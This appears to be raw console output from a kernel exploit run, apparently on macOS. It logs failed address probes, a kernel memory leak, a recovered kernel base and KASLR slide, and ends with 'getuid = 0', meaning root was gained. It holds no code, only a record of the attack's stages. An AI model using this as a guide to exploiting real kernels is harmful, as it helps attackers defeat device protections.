address:ffffff8001840000 29 | fail, address:ffffff8001940000 30 | fail, address:ffffff8001a40000 31 | fail, address:ffffff8001b40000 32 | fail, address:ffffff8001c40000 33 | fail, address:ffffff8001d40000 34 | fail, address:ffffff8001e40000 35 | fail, address:ffffff8001f40000 36 | fail, address:ffffff8002040000 37 | fail, address:ffffff8002140000 38 | fail, address:ffffff8002240000 39 | fail, address:ffffff8002340000 40 | fail, address:ffffff8002440000 41 | fail, address:ffffff8002540000 42 | fail, address:ffffff8002640000 43 | fail, address:ffffff8002740000 44 | fail, address:ffffff8002840000 45 | fail, address:ffffff8002940000 46 | fail, address:ffffff8002a40000 47 | fail, address:ffffff8002b40000 48 | fail, address:ffffff8002c40000 49 | fail, address:ffffff8002d40000 50 | fail, address:ffffff8002e40000 51 | fail, address:ffffff8002f40000 52 | fail, address:ffffff8003040000 53 | fail, address:ffffff8003140000 54 | fail, address:ffffff8003240000 55 | fail, address:ffffff8003340000 56 | fail, address:ffffff8003440000 57 | fail, address:ffffff8003540000 58 | fail, address:ffffff8003640000 59 | fail, address:ffffff8003740000 60 | fail, address:ffffff8003840000 61 | fail, address:ffffff8003940000 62 | fail, address:ffffff8003a40000 63 | fail, address:ffffff8003b40000 64 | fail, address:ffffff8003c40000 65 | fail, address:ffffff8003d40000 66 | fail, address:ffffff8003e40000 67 | fail, address:ffffff8003f40000 68 | fail, address:ffffff8004040000 69 | fail, address:ffffff8004140000 70 | fail, address:ffffff8004240000 71 | fail, address:ffffff8004340000 72 | fail, address:ffffff8004440000 73 | fail, address:ffffff8004540000 74 | fail, address:ffffff8004640000 75 | fail, address:ffffff8004740000 76 | fail, address:ffffff8004840000 77 | fail, address:ffffff8004940000 78 | fail, address:ffffff8004a40000 79 | fail, address:ffffff8004b40000 80 | fail, address:ffffff8004c40000 81 | fail, address:ffffff8004d40000 82 | fail, address:ffffff8004e40000 83 | fail, address:ffffff8004f40000 84 | fail, address:ffffff8005040000 85 | fail, address:ffffff8005140000 86 | fail, address:ffffff8005240000 87 | fail, address:ffffff8005340000 88 | fail, address:ffffff8005440000 89 | fail, address:ffffff8005540000 90 | fail, address:ffffff8005640000 91 | fail, address:ffffff8005740000 92 | fail, address:ffffff8005840000 93 | fail, address:ffffff8005940000 94 | fail, address:ffffff8005a40000 95 | fail, address:ffffff8005b40000 96 | fail, address:ffffff8005c40000 97 | fail, address:ffffff8005d40000 98 | fail, address:ffffff8005e40000 99 | fail, address:ffffff8005f40000 100 | fail, address:ffffff8006040000 101 | fail, address:ffffff8006140000 102 | fail, address:ffffff8006240000 103 | fail, address:ffffff8006340000 104 | fail, address:ffffff8006440000 105 | fail, address:ffffff8006540000 106 | fail, address:ffffff8006640000 107 | fail, address:ffffff8006740000 108 | fail, address:ffffff8006840000 109 | fail, address:ffffff8006940000 110 | fail, address:ffffff8006a40000 111 | fail, address:ffffff8006b40000 112 | fail, address:ffffff8006c40000 113 | fail, address:ffffff8006d40000 114 | fail, address:ffffff8006e40000 115 | fail, address:ffffff8006f40000 116 | fail, address:ffffff8007040000 117 | fail, address:ffffff8007140000 118 | fail, address:ffffff8007240000 119 | fail, address:ffffff8007340000 120 | fail, address:ffffff8007440000 121 | fail, address:ffffff8007540000 122 | fail, address:ffffff8007640000 123 | fail, address:ffffff8007740000 124 | fail, address:ffffff8007840000 125 | fail, address:ffffff8007940000 126 | fail, address:ffffff8007a40000 127 | fail, address:ffffff8007b40000 128 | fail, address:ffffff8007c40000 129 | fail, address:ffffff8007d40000 130 | fail, address:ffffff8007e40000 131 | fail, address:ffffff8007f40000 132 | fail, address:ffffff8008040000 133 | fail, address:ffffff8008140000 134 | fail, address:ffffff8008240000 135 | fail, address:ffffff8008340000 136 | fail, address:ffffff8008440000 137 | fail, address:ffffff8008540000 138 | fail, address:ffffff8008640000 139 | fail, address:ffffff8008740000 140 | fail, address:ffffff8008840000 141 | fail, address:ffffff8008940000 142 | fail, address:ffffff8008a40000 143 | fail, address:ffffff8008b40000 144 | fail, address:ffffff8008c40000 145 | fail, address:ffffff8008d40000 146 | fail, address:ffffff8008e40000 147 | fail, address:ffffff8008f40000 148 | fail, address:ffffff8009040000 149 | fail, address:ffffff8009140000 150 | fail, address:ffffff8009240000 151 | fail, address:ffffff8009340000 152 | fail, address:ffffff8009440000 153 | fail, address:ffffff8009540000 154 | fail, address:ffffff8009640000 155 | fail, address:ffffff8009740000 156 | fail, address:ffffff8009840000 157 | fail, address:ffffff8009940000 158 | fail, address:ffffff8009a40000 159 | fail, address:ffffff8009b40000 160 | fail, address:ffffff8009c40000 161 | fail, address:ffffff8009d40000 162 | fail, address:ffffff8009e40000 163 | fail, address:ffffff8009f40000 164 | fail, address:ffffff800a040000 165 | fail, address:ffffff800a140000 166 | fail, address:ffffff800a240000 167 | fail, address:ffffff800a340000 168 | fail, address:ffffff800a440000 169 | fail, address:ffffff800a540000 170 | fail, address:ffffff800a640000 171 | fail, address:ffffff800a740000 172 | fail, address:ffffff800a840000 173 | fail, address:ffffff800a940000 174 | fail, address:ffffff800aa40000 175 | fail, address:ffffff800ab40000 176 | fail, address:ffffff800ac40000 177 | fail, address:ffffff800ad40000 178 | fail, address:ffffff800ae40000 179 | fail, address:ffffff800af40000 180 | fail, address:ffffff800b040000 181 | fail, address:ffffff800b140000 182 | fail, address:ffffff800b240000 183 | fail, address:ffffff800b340000 184 | fail, address:ffffff800b440000 185 | fail, address:ffffff800b540000 186 | fail, address:ffffff800b640000 187 | fail, address:ffffff800b740000 188 | fail, address:ffffff800b840000 189 | fail, address:ffffff800b940000 190 | fail, address:ffffff800ba40000 191 | fail, address:ffffff800bb40000 192 | fail, address:ffffff800bc40000 193 | fail, address:ffffff800bd40000 194 | fail, address:ffffff800be40000 195 | fail, address:ffffff800bf40000 196 | fail, address:ffffff800c040000 197 | fail, address:ffffff800c140000 198 | fail, address:ffffff800c240000 199 | fail, address:ffffff800c340000 200 | fail, address:ffffff800c440000 201 | fail, address:ffffff800c540000 202 | fail, address:ffffff800c640000 203 | fail, address:ffffff800c740000 204 | fail, address:ffffff800c840000 205 | fail, address:ffffff800c940000 206 | fail, address:ffffff800ca40000 207 | fail, address:ffffff800cb40000 208 | fail, address:ffffff800cc40000 209 | fail, address:ffffff800cd40000 210 | fail, address:ffffff800ce40000 211 | fail, address:ffffff800cf40000 212 | fail, address:ffffff800d040000 213 | fail, address:ffffff800d140000 214 | fail, address:ffffff800d240000 215 | fail, address:ffffff800d340000 216 | fail, address:ffffff800d440000 217 | fail, address:ffffff800d540000 218 | fail, address:ffffff800d640000 219 | fail, address:ffffff800d740000 220 | fail, address:ffffff800d840000 221 | fail, address:ffffff800d940000 222 | fail, address:ffffff800da40000 223 | fail, address:ffffff800db40000 224 | fail, address:ffffff800dc40000 225 | fail, address:ffffff800dd40000 226 | fail, address:ffffff800de40000 227 | fail, address:ffffff800df40000 228 | fail, address:ffffff800e040000 229 | fail, address:ffffff800e140000 230 | fail, address:ffffff800e240000 231 | fail, address:ffffff800e340000 232 | fail, address:ffffff800e440000 233 | fail, address:ffffff800e540000 234 | fail, address:ffffff800e640000 235 | fail, address:ffffff800e740000 236 | fail, address:ffffff800e840000 237 | fail, address:ffffff800e940000 238 | fail, address:ffffff800ea40000 239 | fail, address:ffffff800eb40000 240 | fail, address:ffffff800ec40000 241 | fail, address:ffffff800ed40000 242 | fail, address:ffffff800ee40000 243 | fail, address:ffffff800ef40000 244 | fail, address:ffffff800f040000 245 | fail, address:ffffff800f140000 246 | fail, address:ffffff800f240000 247 | fail, address:ffffff800f340000 248 | fail, address:ffffff800f440000 249 | fail, address:ffffff800f540000 250 | fail, address:ffffff800f640000 251 | fail, address:ffffff800f740000 252 | fail, address:ffffff800f840000 253 | fail, address:ffffff800f940000 254 | fail, address:ffffff800fa40000 255 | fail, address:ffffff800fb40000 256 | fail, address:ffffff800fc40000 257 | fail, address:ffffff800fd40000 258 | fail, address:ffffff800fe40000 259 | fail, address:ffffff800ff40000 260 | fail, address:ffffff8010040000 261 | fail, address:ffffff8010140000 262 | fail, address:ffffff8010240000 263 | fail, address:ffffff8010340000 264 | fail, address:ffffff8010440000 265 | fail, address:ffffff8010540000 266 | fail, address:ffffff8010640000 267 | fail, address:ffffff8010740000 268 | fail, address:ffffff8010840000 269 | fail, address:ffffff8010940000 270 | fail, address:ffffff8010a40000 271 | fail, address:ffffff8010b40000 272 | fail, address:ffffff8010c40000 273 | fail, address:ffffff8010d40000 274 | fail, address:ffffff8010e40000 275 | fail, address:ffffff8010f40000 276 | fail, address:ffffff8011040000 277 | fail, address:ffffff8011140000 278 | fail, address:ffffff8011240000 279 | fail, address:ffffff8011340000 280 | fail, address:ffffff8011440000 281 | fail, address:ffffff8011540000 282 | fail, address:ffffff8011640000 283 | fail, address:ffffff8011740000 284 | fail, address:ffffff8011840000 285 | fail, address:ffffff8011940000 286 | fail, address:ffffff8011a40000 287 | fail, address:ffffff8011b40000 288 | fail, address:ffffff8011c40000 289 | fail, address:ffffff8011d40000 290 | fail, address:ffffff8011e40000 291 | fail, address:ffffff8011f40000 292 | fail, address:ffffff8012040000 293 | fail, address:ffffff8012140000 294 | fail, address:ffffff8012240000 295 | fail, address:ffffff8012340000 296 | fail, address:ffffff8012440000 297 | fail, address:ffffff8012540000 298 | fail, address:ffffff8012640000 299 | fail, address:ffffff8012740000 300 | fail, address:ffffff8012840000 301 | fail, address:ffffff8012940000 302 | fail, address:ffffff8012a40000 303 | fail, address:ffffff8012b40000 304 | fail, address:ffffff8012c40000 305 | fail, address:ffffff8012d40000 306 | fail, address:ffffff8012e40000 307 | fail, address:ffffff8012f40000 308 | fail, address:ffffff8013040000 309 | fail, address:ffffff8013140000 310 | fail, address:ffffff8013240000 311 | fail, address:ffffff8013340000 312 | fail, address:ffffff8013440000 313 | fail, address:ffffff8013540000 314 | fail, address:ffffff8013640000 315 | fail, address:ffffff8013740000 316 | fail, address:ffffff8013840000 317 | fail, address:ffffff8013940000 318 | fail, address:ffffff8013a40000 319 | fail, address:ffffff8013b40000 320 | fail, address:ffffff8013c40000 321 | fail, address:ffffff8013d40000 322 | fail, address:ffffff8013e40000 323 | fail, address:ffffff8013f40000 324 | fail, address:ffffff8014040000 325 | fail, address:ffffff8014140000 326 | fail, address:ffffff8014240000 327 | fail, address:ffffff8014340000 328 | fail, address:ffffff8014440000 329 | fail, address:ffffff8014540000 330 | fail, address:ffffff8014640000 331 | fail, address:ffffff8014740000 332 | fail, address:ffffff8014840000 333 | fail, address:ffffff8014940000 334 | fail, address:ffffff8014a40000 335 | fail, address:ffffff8014b40000 336 | fail, address:ffffff8014c40000 337 | fail, address:ffffff8014d40000 338 | fail, address:ffffff8014e40000 339 | fail, address:ffffff8014f40000 340 | fail, address:ffffff8015040000 341 | fail, address:ffffff8015140000 342 | fail, address:ffffff8015240000 343 | fail, address:ffffff8015340000 344 | fail, address:ffffff8015440000 345 | fail, address:ffffff8015540000 346 | fail, address:ffffff8015640000 347 | fail, address:ffffff8015740000 348 | fail, address:ffffff8015840000 349 | fail, address:ffffff8015940000 350 | fail, address:ffffff8015a40000 351 | fail, address:ffffff8015b40000 352 | fail, address:ffffff8015c40000 353 | fail, address:ffffff8015d40000 354 | fail, address:ffffff8015e40000 355 | fail, address:ffffff8015f40000 356 | fail, address:ffffff8016040000 357 | fail, address:ffffff8016140000 358 | fail, address:ffffff8016240000 359 | fail, address:ffffff8016340000 360 | fail, address:ffffff8016440000 361 | fail, address:ffffff8016540000 362 | fail, address:ffffff8016640000 363 | fail, address:ffffff8016740000 364 | fail, address:ffffff8016840000 365 | fail, address:ffffff8016940000 366 | fail, address:ffffff8016a40000 367 | fail, address:ffffff8016b40000 368 | fail, address:ffffff8016c40000 369 | fail, address:ffffff8016d40000 370 | fail, address:ffffff8016e40000 371 | fail, address:ffffff8016f40000 372 | fail, address:ffffff8017040000 373 | fail, address:ffffff8017140000 374 | fail, address:ffffff8017240000 375 | fail, address:ffffff8017340000 376 | fail, address:ffffff8017440000 377 | fail, address:ffffff8017540000 378 | fail, address:ffffff8017640000 379 | fail, address:ffffff8017740000 380 | fail, address:ffffff8017840000 381 | fail, address:ffffff8017940000 382 | fail, address:ffffff8017a40000 383 | fail, address:ffffff8017b40000 384 | fail, address:ffffff8017c40000 385 | fail, address:ffffff8017d40000 386 | fail, address:ffffff8017e40000 387 | fail, address:ffffff8017f40000 388 | fail, address:ffffff8018040000 389 | fail, address:ffffff8018140000 390 | fail, address:ffffff8018240000 391 | fail, address:ffffff8018340000 392 | fail, address:ffffff8018440000 393 | fail, address:ffffff8018540000 394 | fail, address:ffffff8018640000 395 | fail, address:ffffff8018740000 396 | fail, address:ffffff8018840000 397 | fail, address:ffffff8018940000 398 | fail, address:ffffff8018a40000 399 | fail, address:ffffff8018b40000 400 | fail, address:ffffff8018c40000 401 | fail, address:ffffff8018d40000 402 | fail, address:ffffff8018e40000 403 | fail, address:ffffff8018f40000 404 | fail, address:ffffff8019040000 405 | fail, address:ffffff8019140000 406 | found clock 407 | leaked_ptr:ffffff80192271c0 408 | clock task ptr = 0xffffff8019224000 409 | leaked:0 410 | leaked:0 411 | leaked:0 412 | leaked:0 413 | leaked:0 414 | leaked:0 415 | leaked:0 416 | leaked:633e0000 417 | leaked:0 418 | leaked:18908000 419 | leaked:726f5765 420 | leaked:68003138 421 | leaked:31332e39 422 | leaked:32353a 423 | leaked:776e7520 424 | leaked:65657266 425 | leaked:746f6e20 426 | leaked:782e656c 427 | leaked:4749425f 428 | leaked:632e676f 429 | leaked:72617262 430 | leaked:622f322e 431 | leaked:70797420 432 | leaked:74636574 433 | leaked:6d6e6920 434 | leaked:332e3938 435 | leaked:322e3133 436 | leaked:3d212072 437 | leaked:656c7070 438 | leaked:65626d65 439 | leaked:64253a73 440 | leaked:3a732500 441 | leaked:29642520 442 | leaked:6f632f73 443 | leaked:37332d75 444 | leaked:735f706f 445 | leaked:39383733 446 | leaked:746f6f62 447 | leaked:25203a73 448 | leaked:25783230 449 | leaked:6c363130 450 | leaked:692f6b6d 451 | leaked:2f736563 452 | leaked:6f632f73 453 | leaked:74735f70 454 | leaked:6d695f72 455 | leaked:6c6c6162 456 | leaked:61007469 457 | leaked:5600736c 458 | leaked:726f6d65 459 | leaked:ffffffff 460 | leaked:ffffffff 461 | leaked:0 462 | leaked:0 463 | leaked:0 464 | leaked:0 465 | leaked:6b4a2ec0 466 | leaked:1e92005a 467 | leaked:d9d9d9d9 468 | leaked:ffff3b82 469 | leaked:bb9 470 | leaked:48000007 471 | leaked:f8833e74 472 | leaked:f9e8f689 473 | leaked:30850fc0 474 | leaked:e8de8948 475 | leaked:93840f 476 | leaked:1ab52d 477 | leaked:2a80000 478 | leaked:d5 479 | leaked:48b8558b 480 | leaked:bd058b33 481 | leaked:10ba4846 482 | leaked:840fdb85 483 | leaked:89410000 484 | leaked:1cb664 485 | leaked:c8440f48 486 | leaked:4e74f685 487 | leaked:3d8b48ff 488 | leaked:74c83948 489 | leaked:1b641ff 490 | leaked:f9830830 491 | leaked:eb2850ff 492 | leaked:1b02850 493 | leaked:204d8941 494 | leaked:8d41ffff 495 | leaked:e5894855 496 | leaked:4e74f685 497 | leaked:e5894855 498 | leaked:c35d5f41 499 | leaked:2046c7 500 | leaked:fff6894c 501 | leaked:58d48ff 502 | leaked:798348c0 503 | leaked:cc894d18 504 | leaked:b8830000 505 | leaked:f7000000 506 | leaked:df894800 507 | leaked:1b7 508 | leaked:b0558d48 509 | leaked:6666c35d 510 | leaked:e5894855 511 | leaked:8a424675 512 | leaked:74e4854d 513 | leaked:933ae800 514 | leaked:113d8b48 515 | leaked:7274d455 516 | leaked:4ce43145 517 | leaked:eb000000 518 | leaked:e6894cf7 519 | leaked:d901f989 520 | leaked:48d00148 521 | leaked:fffffe 522 | leaked:c9310000 523 | leaked:ff8b207c 524 | leaked:e5894855 525 | leaked:48038b48 526 | leaked:666666ff 527 | leaked:854dc689 528 | leaked:49e80000 529 | leaked:f8830146 530 | leaked:8d48068b 531 | leaked:e5894855 532 | leaked:e5894855 533 | leaked:ffffd214 534 | leaked:47883 535 | leaked:d3870fff 536 | leaked:1575383d 537 | leaked:8b490000 538 | leaked:18438948 539 | leaked:48001cc0 540 | leaked:8548ffa8 541 | leaked:2f75000d 542 | leaked:8d48001d 543 | leaked:8b420000 544 | leaked:48ff8941 545 | leaked:8948ffaf 546 | leaked:187701fe 547 | leaked:1c74e485 548 | leaked:8 549 | leaked:666666ff 550 | leaked:ffaafe2c 551 | leaked:48e9ffff 552 | leaked:41ffb0a0 553 | leaked:fe8ae8d0 554 | leaked:fffad085 555 | leaked:380808b 556 | leaked:4818478b 557 | leaked:fffffa63 558 | leaked:45358d48 559 | leaked:29cb3c 560 | leaked:e5894855 561 | leaked:41204889 562 | leaked:f000001 563 | leaked:3b14408b 564 | leaked:f748c889 565 | leaked:83213d83 566 | leaked:4 567 | leaked:894c0f74 568 | leaked:4d000000 569 | leaked:457402fe 570 | leaked:c8890b8b 571 | leaked:65000000 572 | leaked:b8000000 573 | leaked:c8c481 574 | leaked:70858b48 575 | leaked:18868b49 576 | leaked:44b85d89 577 | leaked:22358d48 578 | leaked:77dc8949 579 | leaked:8bffb760 580 | leaked:4894800 581 | leaked:fffe8349 582 | leaked:1beff 583 | leaked:ffffffe 584 | leaked:7701ff83 585 | leaked:88410324 586 | leaked:b40a7be8 587 | leaked:1000e1 588 | leaked:48000000 589 | leaked:240b883 590 | leaked:a0458948 591 | leaked:f4b589ff 592 | leaked:f480000 593 | leaked:4ba06 594 | leaked:fffb10e9 595 | leaked:3d8d48ef 596 | leaked:f1358d48 597 | leaked:49000000 598 | leaked:ff4508b 599 | leaked:4921894c 600 | leaked:448d49c4 601 | leaked:4c8b4900 602 | leaked:e43145ff 603 | leaked:e5894855 604 | leaked:e8c78948 605 | leaked:e81ae8c0 606 | leaked:fff45adc 607 | leaked:56b60f41 608 | leaked:2b840f00 609 | leaked:4ca8ebff 610 | leaked:2c7e6c 611 | leaked:df8948ff 612 | leaked:e5894855 613 | leaked:3944c8ff 614 | leaked:48000000 615 | leaked:a0758948 616 | leaked:35be3e 617 | leaked:10508b48 618 | leaked:c0fe0000 619 | leaked:fffff8da 620 | leaked:a8858b00 621 | leaked:24748a45 622 | leaked:f45c189 623 | leaked:8b480846 624 | leaked:ffc03145 625 | leaked:3145ffff 626 | leaked:48ffbe0a 627 | leaked:e8f6894c 628 | leaked:45894810 629 | leaked:8d4809eb 630 | leaked:e68944ef 631 | leaked:5d896608 632 | leaked:48c829f9 633 | leaked:148ffff 634 | leaked:e5894855 635 | leaked:8b207ec0 636 | leaked:4b900 637 | leaked:8948b04d 638 | leaked:480033ae 639 | leaked:31000000 640 | leaked:fffff7e0 641 | leaked:c9849d4d 642 | leaked:fe4854d 643 | leaked:45008b48 644 | leaked:1bf 645 | leaked:ce430f45 646 | leaked:556 647 | leaked:28b841de 648 | leaked:fffff91e 649 | leaked:2374c439 650 | leaked:ffc3fb7c 651 | leaked:16 652 | leaked:0 653 | leaked:674c085 654 | leaked:83f60975 655 | leaked:4c1d7501 656 | leaked:c083 657 | leaked:43c71843 658 | leaked:10b8 659 | leaked:8b48ce75 660 | leaked:347b83 661 | leaked:c6c39be8 662 | leaked:f7 663 | leaked:1 664 | leaked:ebc00206 665 | leaked:3d8d481d 666 | leaked:cd202be8 667 | leaked:8bc8440f 668 | leaked:8d48ffff 669 | leaked:4c0928b 670 | leaked:b34b60f 671 | leaked:4f178c 672 | leaked:f304639 673 | leaked:8bc1440f 674 | leaked:4a001 675 | leaked:4ba0000 676 | leaked:468a4173 677 | leaked:788b4900 678 | leaked:4c404289 679 | leaked:48003baf 680 | leaked:2d684 681 | leaked:c03102eb 682 | leaked:eb0124f0 683 | leaked:ce89404a 684 | leaked:848b41c0 685 | leaked:31003d26 686 | leaked:e5894855 687 | leaked:4850b60f 688 | leaked:8075b60f 689 | leaked:1be 690 | leaked:9045c622 691 | leaked:8d480042 692 | leaked:7401f983 693 | leaked:e5894855 694 | leaked:666611eb 695 | leaked:30958d48 696 | leaked:49c 697 | leaked:8b48c689 698 | leaked:c3894830 699 | leaked:c7b60f40 700 | leaked:e2894cde 701 | leaked:20693cba 702 | leaked:f766744f 703 | leaked:858bffff 704 | leaked:88 705 | leaked:840f66fb 706 | leaked:b9258d4c 707 | leaked:ffd7602c 708 | leaked:a02ae8e6 709 | leaked:1f8838b 710 | leaked:668d4d3e 711 | leaked:c7660000 712 | leaked:1c4ae8df 713 | leaked:850f2ef8 714 | leaked:6d8b4d 715 | leaked:c1483fe9 716 | leaked:e5894855 717 | leaked:5a7a3b 718 | leaked:8b481f74 719 | leaked:f7894800 720 | leaked:48fffffe 721 | leaked:5850f65 722 | leaked:1fe28303 723 | leaked:8b4cd8b6 724 | leaked:2d8d4cff 725 | leaked:e5894855 726 | leaked:38bd8d48 727 | leaked:72e0394c 728 | leaked:8545d07d 729 | leaked:31fffffd 730 | leaked:585ebc 731 | leaked:83417c47 732 | leaked:3042c7 733 | leaked:283d8348 734 | leaked:fffe1c85 735 | leaked:99e8fa89 736 | leaked:ddf2158b 737 | leaked:d231ffe2 738 | leaked:16 739 | leaked:c7000000 740 | leaked:83480474 741 | leaked:f883008b 742 | leaked:d9e8d389 743 | leaked:d98948ea 744 | leaked:894cc031 745 | leaked:f44c295 746 | leaked:e48545c4 747 | leaked:23486 748 | leaked:75894cac 749 | leaked:f7546f8 750 | leaked:de8948ff 751 | leaked:44894818 752 | leaked:c389c839 753 | leaked:45ffffff 754 | leaked:6666663a 755 | leaked:41000000 756 | leaked:41fffeea 757 | leaked:fe78bd83 758 | leaked:8b490848 759 | leaked:83000000 760 | leaked:10438b48 761 | leaked:cb804 762 | leaked:ff350200 763 | leaked:c6940f40 764 | leaked:ffffec9b 765 | leaked:be485f8b 766 | leaked:450f44c1 767 | leaked:1ff 768 | leaked:8d8b48ff 769 | leaked:25c87 770 | leaked:d8 771 | leaked:3c748 772 | leaked:48187189 773 | leaked:487b740b 774 | leaked:7724fd83 775 | leaked:606a358d 776 | leaked:5cedc4 777 | leaked:48020000 778 | leaked:32e9ffff 779 | leaked:c748c689 780 | leaked:c85d8b48 781 | leaked:fc98400 782 | leaked:c7894900 783 | leaked:b0411174 784 | leaked:ffffff08 785 | leaked:5750200 786 | leaked:4810428b 787 | leaked:858944ff 788 | leaked:98458948 789 | leaked:39488045 790 | leaked:894c0000 791 | leaked:48fffffd 792 | leaked:104f8b4d 793 | leaked:7974c085 794 | leaked:2c7a3d8d 795 | leaked:8f80be49 796 | leaked:f6854800 797 | leaked:c73c8348 798 | leaked:8941a055 799 | leaked:b8ec8945 800 | leaked:81480a74 801 | leaked:408b0a74 802 | leaked:9aca00c0 803 | leaked:ebe99090 804 | leaked:3a1a058b 805 | leaked:d989c889 806 | leaked:85000000 807 | leaked:c800069 808 | leaked:c7f741c7 809 | leaked:8948d689 810 | leaked:2145fa89 811 | leaked:89c1d1bc 812 | leaked:a9058900 813 | leaked:ffffff68 814 | leaked:23c6c 815 | leaked:20605f7 816 | leaked:45894800 817 | leaked:c482 818 | leaked:ff002bdd 819 | leaked:48ffffff 820 | leaked:7c8b4dd0 821 | leaked:8b440000 822 | leaked:1 823 | leaked:3948006d 824 | leaked:940f0010 825 | leaked:f0ffffba 826 | leaked:7d8b4800 827 | leaked:48010075 828 | leaked:8d48006e 829 | leaked:f7401c1 830 | leaked:b9d231ff 831 | leaked:4c1575c8 832 | leaked:294c0000 833 | leaked:ae7e9cb 834 | leaked:4f8894c 835 | leaked:40000 836 | leaked:4c16ebff 837 | leaked:c38148ff 838 | leaked:a07d8b48 839 | leaked:ff78bd8b 840 | leaked:8b41fff3 841 | leaked:aeb3775 842 | leaked:4cf80148 843 | leaked:49006aae 844 | leaked:3a8 845 | leaked:48204689 846 | leaked:8d480068 847 | leaked:e5894855 848 | leaked:ff37e900 849 | leaked:2e9a058b 850 | leaked:481d7e0c 851 | leaked:f480000 852 | leaked:8944ffcd 853 | leaked:f3d8d48 854 | leaked:8b480c74 855 | leaked:a7830f 856 | leaked:e8d04d8b 857 | leaked:8b486500 858 | leaked:609f8b1a 859 | leaked:79e8df89 860 | leaked:1825 861 | leaked:18250c 862 | leaked:93d8d48 863 | leaked:fffff700 864 | leaked:4c4b4000 865 | leaked:4cf8be0f 866 | leaked:5f415e41 867 | leaked:50b08b48 868 | leaked:e083e089 869 | leaked:3b480000 870 | leaked:240c8b4d 871 | leaked:73c2394c 872 | leaked:d44d89c7 873 | leaked:76000000 874 | leaked:49ff8545 875 | leaked:30e9d389 876 | leaked:527512fe 877 | leaked:4808588b 878 | leaked:e0835840 879 | leaked:c166d0f7 880 | leaked:e68141 881 | leaked:39482a74 882 | leaked:26ae853 883 | leaked:e8008080 884 | leaked:850f08fa 885 | leaked:ffffffc8 886 | leaked:d0894872 887 | leaked:85480000 888 | leaked:8c48348 889 | leaked:90f4e489 890 | leaked:74c08548 891 | leaked:0 892 | leaked:0 893 | leaked:0 894 | leaked:0 895 | leaked:0 896 | leaked:0 897 | leaked:0 898 | leaked:0 899 | leaked:0 900 | leaked:0 901 | leaked:0 902 | leaked:0 903 | leaked:0 904 | leaked:0 905 | leaked:0 906 | leaked:0 907 | leaked:0 908 | leaked:0 909 | leaked:0 910 | leaked:0 911 | leaked:0 912 | leaked:0 913 | leaked:0 914 | leaked:0 915 | leaked:0 916 | leaked:0 917 | leaked:0 918 | leaked:0 919 | leaked:0 920 | leaked:0 921 | leaked:0 922 | leaked:0 923 | leaked:0 924 | leaked:0 925 | leaked:0 926 | leaked:0 927 | leaked:0 928 | leaked:0 929 | leaked:0 930 | leaked:feedfacf 931 | found kernel text at 0xffffff8018a00000 932 | kernproc:ffffff80192bb360 933 | kernel_base=0xffffff8018a00000 slide=0x18800000 header=0x1000007feedfacf 934 | getuid = 0 935 | --------------------------------------------------------------------------------